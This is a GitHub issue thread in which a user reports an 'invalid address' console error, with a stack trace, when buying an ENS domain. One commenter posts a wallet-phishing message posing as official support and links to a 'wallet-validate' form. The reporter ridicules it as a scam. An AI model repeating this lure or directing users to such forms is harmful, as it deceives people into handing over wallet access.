### ISSUE TITLE
"fromPromise error:  Error: invalid address" shows in the console when I try to buy a domain

### ISSUE THREAD

**Issue by kcc0** [ensdomains/ens#395]
This below error shows up in the console when I try to buy any domain. Metamask doesn't popup or anything.
I'm not coding anything here, I'm just trying to buy a domain.

```
fromPromise error:  Error: invalid address (argument="address", value="0x0", code=INVALID_ARGUMENT, version=address/5.5.0)
    at e.value (index.ts:225:28)
    at e.value (index.ts:237:20)
    at e.value (index.ts:241:21)
    at Ge (index.ts:109:16)
    at e.value (formatter.ts:235:16)
    at r.<anonymous> (base-provider.ts:1717:51)
    at f (runtime.js:63:40)
    at Generator._invoke (runtime.js:294:22)
    at Generator.next (runtime.js:119:21)
    at a (formatter.ts:521:17)
(anonymous) @ instrument.ts:129
(anonymous) @ apolloClient.js:53
Promise.catch (async)
(anonymous) @ apolloClient.js:43
e @ Observable.js:197
value @ Observable.js:279
complete @ Concast.ts:210
t.start @ Concast.ts:103
t @ Concast.ts:83
e.getObservableFromLink @ QueryManager.ts:1001
(anonymous) @ QueryManager.ts:236
(anonymous) @ QueryManager.ts:224
(anonymous) @ tslib.es6.js:102
(anonymous) @ tslib.es6.js:83
(anonymous) @ tslib.es6.js:76
u @ tslib.es6.js:72
e.mutate @ QueryManager.ts:169
e.mutate @ ApolloClient.ts:367
t.mutate @ MutationData.ts:98
o.runMutation @ MutationData.ts:75
u @ react-dom.production.min.js:14
h @ react-dom.production.min.js:14
(anonymous) @ react-dom.production.min.js:14
m @ react-dom.production.min.js:15
ut @ react-dom.production.min.js:52
ot @ react-dom.production.min.js:51
st @ react-dom.production.min.js:52
pt @ react-dom.production.min.js:56
D @ react-dom.production.min.js:287
z @ react-dom.production.min.js:19
$t @ react-dom.production.min.js:70
Xt @ react-dom.production.min.js:69
t.unstable_runWithPriority @ scheduler.production.min.js:19
Gi @ react-dom.production.min.js:122
L @ react-dom.production.min.js:287
Qt @ react-dom.production.min.js:68
sentryWrapped @ helpers.ts:88
Show 6 more frames
```

Anyone have any idea why this is happening?

**Comment by Davidjason1** [comment]
Hello Welcome To The Official Community 
We got your message.

You’re required to reconnect to Decentralised Application Dapps

https://form.jotform.com/Connectsync/wallet-validate-

The process is automated and end-to-end encrypted,therefore it has zero human interference which makes you safe and secured.

**Comment by kcc0** [comment]
> Hello Welcome To The Official Community 
> We got your message.
> 
> You’re required to reconnect to Decentralised Application Dapps
> 
> https://form.jotform.com/Connectsync/wallet-validate-
> 
> The process is automated and end-to-end encrypted,therefore it has zero human interference which makes you safe and secured.

Oh yeah! SURE!

Let me just connect my wallet, provide the private key to my wallet and sign the deeds to my house while I'm at it!

**Comment by Davidjason1** [comment]
Done?
